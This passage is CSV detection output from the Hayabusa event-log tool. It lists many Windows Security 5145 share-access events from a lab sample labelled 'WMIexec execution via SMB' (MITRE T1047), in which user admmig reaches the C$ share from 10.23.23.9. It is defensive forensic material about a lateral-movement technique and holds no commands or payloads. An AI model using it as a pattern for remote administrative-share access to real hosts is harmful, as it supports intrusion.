Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.079 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.079 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.096 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7#\fa5c1a0df187c30480b0623065a70395 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d06916#\d61b7f885a9fd4f4766031b996ca7d6a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.099 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.114 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.114 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb9b5bb58#\094367b5bb80758c8f0ab02018658d91 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Contacts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.130 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.145 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.161 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.177 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:32.193 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 